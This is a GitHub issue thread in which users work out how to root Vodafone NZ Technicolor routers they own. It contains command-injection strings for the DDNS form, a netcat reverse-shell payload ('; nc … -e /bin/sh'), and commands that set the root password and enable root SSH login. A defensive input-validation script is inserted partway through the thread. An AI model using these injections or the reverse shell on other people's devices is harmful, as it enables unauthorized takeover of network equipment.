Support for Technicolor DGA0130VDF (VANT-9) and DNA0130VDF (VBNT-Z) from Vodafone NZ #68
Comments
CRF NUMBER#: CRF897 |
Hello,
Have you tried AutoFlashGUI on this model? Could you please post some screenshots of the web GUI?
Edit: And no, ssh is not running at all, even behind iptables. |
Hi kevdagoat, appreciate the reply. The model is not available in AutoFlashGUI. That's interesting. I think there must be a script somewhere to start it, as there is a heap of preconfigured IP addresses that seem to be exempt in the iptables rules. Give me 5 and I'll get back to you :) |
/modals/tr069.lp gives a 404 Not Found from nginx |
I've tried AutoFlashGUI on the different options just now. I'm using python3 on Debian.
`autoflashgui/libautoflashgui.py", line 55, in srp6authenticate`
`/autoflashgui/libautoflashgui.py", line 25, in srp6authenticate`
and other errors; not sure if it's an OS issue, a dependency issue or, more likely, the web interface isn't programmed into the tool. |
Give up on AFG for this device, it's made for the stock tch webui. First chance, set your PC IP to a trusted one and try logging in. Check dropbear settings to determine if password login is allowed and check if it is set by uci-defaults scripts. Also check the vdf webui samba configuration form. Is it allowing arbitrary hostname or workgroup with no proper escaping? If yes, you can try something equivalent to root strategy # 1. Maybe @jameskeenan295 may help you as he already managed to get something for vant-9. |
BTW let me use this thread to update you on VANT-9 & VBNT-Z support progress, here is a checklist to complete for getting it listed on the repo. VANT-9:
VBNT-Z:
|
Sorry for my ambivalence, but what is the best way to set one of these trusted IPs as mine on a local network? At the moment I am connected directly to the router via my eth port to its eth port. Appreciate the help and enjoying the learning. |
You can set whatever IP on your nic and connect to your router wan port to try entering the already enabled ssh instance. |
So dropbear doesn't allow password login and I can't seem to get it to talk to devices through WAN with a static IP address and VLAN set to 0. The cwmp does not use dhcp.
I mapped out the miniupnp server and was thinking of trying to port forward dropbear, but that fails as well.
urn:schemas-upnp-org:service:Layer3Forwarding:1
urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1
urn:schemas-upnp-org:service:WANIPConnection:1
I'm not 100% sure if this would lead to anything, but the dynamic DNS configuration screen does not seem to sanitize input too much. It replaces quotes " with " but otherwise seems like an entry point: /www/docroot/modals/dns-ddns.lp |
When you say you can also push firmwares, you mean through a MITM ACS? I'm just wondering, if we already have the firmware decrypted, whether there is a way to build a new 'patched' update that can be used via the web interface as if it were a regular update, and sign it somehow using keys from the system.
I'm poking around the web interface, but it's all written in Lua, which is new coming from Python, so I'm not 100% sure where to look for syntax etc.
When I connect this to a network with a modem running on 172.16.0.1, I cannot ping 172.16.0.2 or connect to the enabled remote assistance web interface as expected; it's weird.
These modems have some sort of recovery mode when you hold down the reset as it powers on. |
@jameskeenan295 was capable of command execution via that DDNS form as well on the 2.4.6 firmware. Once you manage to execute some commands, let me know, I have something for you to try. In particular I'm interested in knowing if creating a new dropbear instance would not need us to enable that firewall deny option you saw. |
Give up on any CWMP trick on these, I just looked at the above cwmpd settings you posted, they definitely prevent any mitm. |
Thanks @LuKePicci, I'll keep you updated! I've used dropbear in the past on another ARM camera with a precompiled binary; once you generate the keys you can make one big command that starts dropbear on another port with other keys etc.
Well, fingers crossed we can find some command injection, but they sanitize mostly everything, at least from the frontend it seems.
I found a link to an older version of the firmware, but cloudfront/vodafone seems to be having issues and I can't download it at the moment. If anyone has a copy of any older firmware it would be much appreciated as I look for a way in. Cheers for the support |
Give me a mega drop folder where to put them. Probably that link you posted is the correct one even if it is now returning "access denied", this means I could already build torrents for all of them. |
https://mega.nz/megadrop/8DWXMIKmdJA |
Alright weird, so it says its a 17.1.7988-2461009-CRF846-V2.4.6 but this is definitely an earlier version. |
Sure, just try simple commands with noticeable effects, like `echo root:root | chpasswd`

```sh
sed -i 's#/root:.*\$#/root:/bin/ash#' /etc/passwd
sed -i 's/#//' /etc/inittab
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart
```
|
I still haven't been able to figure out the exact string to get the command injection to work. All I know so far is that putting quotation marks in the username field breaks the module somehow. I've tried `:::::::;reboot` in the ping and ddns sections and it doesn't work, but doesn't break the module either.
Edit: I'm taking a break for a while. If anyone has any ideas on command execution injections, or wants me to port forward the administration interface for them to try to get into, let me know. |
I don't know if commands get executed when ddns scripts run or previously during configuration. However, you don't need to go black-box. I would suggest you try looking into the webui code back to the point where ddns configuration is saved and determine where the injection happens. Also, a comparison with newer patched firmware might be of some help. |
I'm having a look into firmware RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336 today.
The new iptables rules appear to allow access to port 22 on the local system and nmap is reading it as filtered, although the dropbear daemon is not running. From the firmware there is a root account, but it does not look like a password is set.
I've attached the ddns updater source code. It appears to use the OpenWrt ddns updater as a backend (https://oldwiki.archive.openwrt.org/doc/uci/ddns).
It also uses an old version of this script here, which is what I am trying to target. It appears not to filter the password, as it could contain special characters. I wish I knew Lua, so I am trying to target the bash side of the script. You can set quotation marks etc. in the password field and it doesn't break the configuration, which is making testing params quicker rather than every test requiring a reboot.
I want to try and exploit this no-ip-updater shell script somehow.
I've tried some arguments such as:
but haven't been able to quite get the syntax right. Is it possible to inject a command in this script? Attached are the relevant files |
Have you tried this:
`domain.com;<command>`
On 13 Dec 2019, at 7:45 am, drbenway6667 wrote:
I'm having a look into firmware RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336 today
The new iptables rules appear to allow access to port 22 on the local system and nmap is reading it as filtered, although the dropbear daemon is not running.
I've attached the ddns updater source code. It appears to use the openwrt ddns updater as a backend (https://oldwiki.archive.openwrt.org/doc/uci/ddns)
It also uses an old version of this script here which is what I am trying to target. It appears to not filter the password as it could contain special characters. I wish I knew lua so am trying to target the bash side of the script. You can set quotation marks etc in the password field and it doesn't break the configuration which is making testing params quicker rather than every test requiring a reboot.
I want to try and exploit this no-ip-updater shell script somehow
```sh
#.Distributed under the terms of the GNU General Public License (GPL) version 2.0
#.2014-2015 Christian Schoenebeck
local __DUMMY
# (the __UPDURL template on the next line was masked by GitHub's e-mail address scrubbing)
local ***@***.***/nic/update?hostname=[DOMAIN]&myip=[IP]"
[ -z "$username" ] && write_log 14 "Service section not configured correctly! Missing 'username'"
[ -z "$password" ] && write_log 14 "Service section not configured correctly! Missing 'password'"
[ $use_ipv6 -eq 0 ] && __DUMMY="127.0.0.1" || __DUMMY="::1"
write_log 7 "sending dummy IP to 'no-ip.com'"
__URL=$(echo $__UPDURL | sed -e "s#\[USERNAME\]#$URL_USER#g" -e "s#\[PASSWORD\]#$URL_PASS#g" \
                             -e "s#\[DOMAIN\]#$domain#g" -e "s#\[IP\]#$__DUMMY#g")
[ $use_https -ne 0 ] && __URL=$(echo $__URL | sed -e 's#^http:#https:#')
do_transfer "$__URL" || return 1
write_log 7 "'no-ip.com' answered:\n$(cat $DATFILE)"
grep -E "good|nochg" $DATFILE >/dev/null 2>&1 || return 1
sleep 1
write_log 7 "sending real IP to 'no-ip.com'"
__URL=$(echo $__UPDURL | sed -e "s#\[USERNAME\]#$URL_USER#g" -e "s#\[PASSWORD\]#$URL_PASS#g" \
                             -e "s#\[DOMAIN\]#$domain#g" -e "s#\[IP\]#$__IP#g")
[ $use_https -ne 0 ] && __URL=$(echo $__URL | sed -e 's#^http:#https:#')
do_transfer "$__URL" || return 1
write_log 7 "'no-ip.com' answered:\n$(cat $DATFILE)"
grep -E "good|nochg" $DATFILE >/dev/null 2>&1
return $?
```
I've tried some arguments such as:
```
") && reboot && echo (
"] && reboot && echo
"];reboot
"];reboot;
";reboot;
;reboot
";reboot
```
but haven't been able to quite get the syntax right. Is it possible to inject a command in this script?
The Lua script uses a bit of regex and filtering to validate the input and sets the uci variables for the ddns script dynamic_dns_updater.sh, which in turn calls update_no-ip_com.sh if it is configured for no-ip.com.
Attached are the relevant files
ddns_files.zip
|
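The discussion above is about a DDNS form whose fields reach a shell script through sed substitution without filtering. As an added defensive example (not code from the OpenWrt ddns scripts, the Technicolor firmware, or anyone on this thread), here is how such fields can be allowlist-validated and the update URL assembled without ever splicing user input into a sed or shell expression; the update host `ddns.example.net` is a constructed placeholder.

```shell
#!/bin/sh
# Added defensive example; not code from the OpenWrt ddns scripts, the
# Technicolor firmware, or anyone on this thread. The update host is a
# constructed placeholder.
DDNS_HOST='ddns.example.net'

# Return 0 if $1 is a syntactically valid hostname (RFC 1123 labels joined
# by dots), 1 otherwise. Anything outside the allowlist is rejected outright,
# so ';', '|', '&', '$', backticks, quotes and whitespace never get through.
is_valid_hostname() {
    _h=$1
    [ -n "$_h" ] && [ ${#_h} -le 253 ] || return 1
    case $_h in
        *[!A-Za-z0-9.-]*) return 1 ;;   # character outside the allowlist
        .*|*.|*..*)       return 1 ;;   # empty label
    esac
    _oldifs=$IFS; IFS=.
    set -- $_h                          # split into labels (no glob chars left)
    IFS=$_oldifs
    for _label; do
        [ ${#_label} -le 63 ] || return 1
        case $_label in
            -*|*-) return 1 ;;          # label may not start or end with '-'
        esac
    done
    return 0
}

# Percent-encode $1 (ASCII input) so a credential containing '#', '@', '/' or
# a space cannot change the structure of the URL it is placed into.
url_encode() {
    _in=$1 _out=
    while [ -n "$_in" ]; do
        _c=${_in%"${_in#?}"}            # first character of the remainder
        _in=${_in#?}
        case $_c in
            [A-Za-z0-9._~-]) _out=$_out$_c ;;
            *) _out=$_out$(printf '%%%02X' "'$_c") ;;
        esac
    done
    printf '%s' "$_out"
}

# build_update_url DOMAIN USERNAME PASSWORD IP
# Prints the update URL, or prints nothing and returns 1 if a field fails
# validation. Same URL shape as the no-ip updater quoted above, but the values
# are concatenated with printf instead of being spliced in with sed, so no
# field is ever parsed as a sed expression or a shell command.
build_update_url() {
    _domain=$1 _user=$2 _pass=$3 _ip=$4
    is_valid_hostname "$_domain" || return 1
    [ -n "$_user" ] && [ -n "$_pass" ] || return 1
    case $_user$_pass in
        *[[:cntrl:]]*) return 1 ;;      # control characters are never valid
    esac
    case $_ip in
        ''|*[!0-9A-Fa-f.:]*) return 1 ;; # IPv4 or IPv6 literal characters only
    esac
    printf 'http://%s:%s@%s/nic/update?hostname=%s&myip=%s\n' \
        "$(url_encode "$_user")" "$(url_encode "$_pass")" \
        "$DDNS_HOST" "$_domain" "$_ip"
}
```

The same checks belong on the Lua side of the form before the values are written to uci, so that a rejected field never reaches the updater at all.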
The tricks for getting root shell on VANT-9 are:
1.1) (not always required) If you've tried TFTP flashing and it still comes up with a version number different to that above, then you need to trigger a bank switch, as follows:
There are other methods for doing bank switches, but this is fairly straightforward.
In OWASP ZAP, search for "test.com" (or whatever domain you used), then right-click the request >> Open/Resend with Request Editor.
Inject commands, using a semicolon immediately after the domain name (test.com or whatever you used):
That is the URL-encoded form of: `;nc 192.168.1.5 5000 -e /bin/sh`
2.2) Assuming that works, you should now have a shell (as root) on the Windows ncat session. From there you need to enter these commands through the ncat session:
Notes:
Feel free to contact me if that doesn't work, or you need any more info. I am hoping we can get the rooting process implemented into AutoFlashGUI (or something similar?) to make it easier for everyone. Hardware needs to be liberated, man! Also, Vodafone NZ have implemented a few subtle things in the default config to prevent people using these routers with other ISPs, so there is some additional liberation work required there from this community, to make these usable by all. |
Great job everyone! Very glad to see someone is working on this, as so many of these little routers are going to landfill unnecessarily! |
Does anybody know if the H500-s and H500-t mentioned here are sharing the exact same spec, just a different manufacturer? S Sercomm, T Technicolor? I'm dying to break my H500s :) |
Usually they have different firmwares but similar housing, specs and web interface UI. |
Hello guys, I tried to run the forked https://github.com/jameskeenan295/autoflashgui against VBNT-Z but I couldn't connect to port 22 after it finished running. I tried debugging and got the response `b'{ "status":"error" }'` after it posted the DDNS hack to http://192.168.1.1/modals/internet/dns_ddns.lp. Is that normal? May I know if the hack is still functioning? |
Make sure you're running the hack against the correct firmware version. Otherwise you should ask @jameskeenan295 directly
If you are running the same firmware version that hack was built for, then it must be still functional. |
I'm using the firmware linked from the repository, downloaded via torrent. However, after I flashed the firmware, the version that I got from the router is (17.4.b.0258-0841007-20181119083924-8307789f20403b4dde0d92852ec0af4bf362c645), which is different from the version listed on the page (17.4.0182CRF877-RC2.0.1). I'm just wondering, usually after the DDNS hack, do you get a success response or error response? |
Ok, so you need to use type 3 instructions (i.e. flash of type 2 firmware and inactive bank boot via enforced bootfail).
Alternatively, if you manage to grab an RBI of your latest firmware and the firmware offers a firmware upgrade page in its webui, then you can use "upgrade" to that same new firmware. This will cause an active bank switch. After the bank switch has occurred, it is enough to flash once again the Type 2 firmware you downloaded from the repo via bootp/tftp (this always flashes bank_1). It will boot the old type 2 firmware you can get root on.
Share the RBI for the new firmware if you have it. Otherwise, once you have got root, make sure to get a dump of the new firmware and share it. Then use the safe firmware upgrade instructions to install the new firmware without losing root access.
|
I think the firmware in the repo link and the latest firmware from Vodafone are both the same. I can't find the old firmware. I did a file comparison using Winmerge and they are identical. |
The old type 2 firmware is that one in the repo. The new firmware is that one your device is running.
|
The thing is that the firmware from the repo (via torrent link) and the firmware that I downloaded from the supplier (http://downloads.vodafone.co.nz/ultrahub-plus/UHP-2-0-1-Prod.rbi) are both the same. I used WinMerge to do the comparison, unless that is not reliable. If that's the case, I don't think type 3 instructions will work, as I don't have an old firmware that works? |
Correct, but the supplier pushed a newer one into the device.
Type 3 instructions always work as long as there exists a Type 2 RBI, and yes, we have it. |
I followed the Type 3 instructions to flash the firmware via BOOTP flashing. I can see that the firmware has been transmitted to the router. But after that, I'm stuck. I'm not sure how I can check the booted bank etc. How do I do the following?
I'm using Windows, and I'm not sure how I can access the router to read that information. Also, after it's flashed and auto-restarting, should I keep the TFTP server running? If it is running, then my PC will get 10.0.0.100 as its IP. The guide may need some clarification as well. |
Needs root access, which you do not have yet.
Needs a serial adapter connected to the device motherboard serial port.
BOOTP flashing uses TFTP for the firmware transfer; this is exactly what you did so far.
Nope, as soon as the device reboots you can stop the TFTP server and release any IP configuration made on purpose.
Now your device bank_1 contains the firmware you just flashed. Is it booting that old firmware? If yes, then your booted bank is bank_1, otherwise it's booting from bank_2. |
At the end of the Type 3 guide you see the following:
The above link points to "Change booted bank", not "Check booted bank". You've got stuck because it is not needed to check the booted bank when coming from phase 2 of the type 3 guide. |
I believe it's still booting the original firmware. I then tried to upgrade the firmware via the web GUI, and after that it rebooted, still on the original firmware. No root can be done. I may try again in case I got it wrong. I'll follow these steps; please let me know if I've got any of them wrong:
Thanks again for your help. |
Your steps are almost correct except 6.
Then, since the above caused a switchover, repeat the TFTP steps again. This time the old firmware loaded via BOOTP would overwrite the new one you placed in bank_1 moments ago. The web GUI basically doesn't allow you to downgrade; to cause a switch you need to provide it the same or a newer firmware version. Let's make this clearer in the wiki. Now, we know you have no RBI available for the current/new firmware, so this bank switch strategy isn't viable. It will become viable for other people once you manage to root and grab this new RBI URL from the Vodafone remote management service. So, go back to that "Change booted bank" section: it says you have two options. The first one, switchover, is a no-go in your situation, unless you keep waiting for Vodafone to push another newer firmware update, so go for the second: bootfail. |
Hmm, it's getting a bit too difficult for me to carry on in that direction now. I may continue in future if Vodafone puts the latest firmware (for VBNT-Z) on the website for people to download. Thanks for your help. |
Other people with rooted VBNT-Z may grab it as well. |
These are the same three VANT-9 firmwares we have in the repo |
Has anyone made any further progress with the VANT-9? I have opened one on my bench and captured the attached serial boot output from the onboard UART. It never gets to the point of allowing login, so I am not sure that this will add any value. |
VANT-9 is already done, just read through this issue. Basically you need to use a custom version of AFG which is pending to be merged by @mswhirl.
You can't use serial console input until you enable it. AFG does it for you while setting up root access. |
Magic, I will give that a crack |
Hi,
I have two vant-9 Technicolor 500-T Vodafone-DGA0130VDF-NZ boxes here I'm trying to unlock.
They run a custom firmware which I've been able to reverse engineer but not get code execution on.
It runs an ssh server behind iptables. I've attached some of the firmware. Any help getting code execution here would be awesome, to root these boxes and get something open source running on them.
I've uploaded the extracted firmware + bins here:
https://mega.nz/#F!kc9wHQhD!hN48b47_1o6NYixBML76xA
Here's some more info I've gathered on the device. I'd be keen to try anything to get this unlocked.
I'd be really keen to try any ideas that anyone may have. We have a heap of these in our country going to waste and it would be awesome to be able to save them from going in the trash.
Does anyone know if there is a way to get code execution on this device so I can build custom firmware on it?
Cheers,
Henry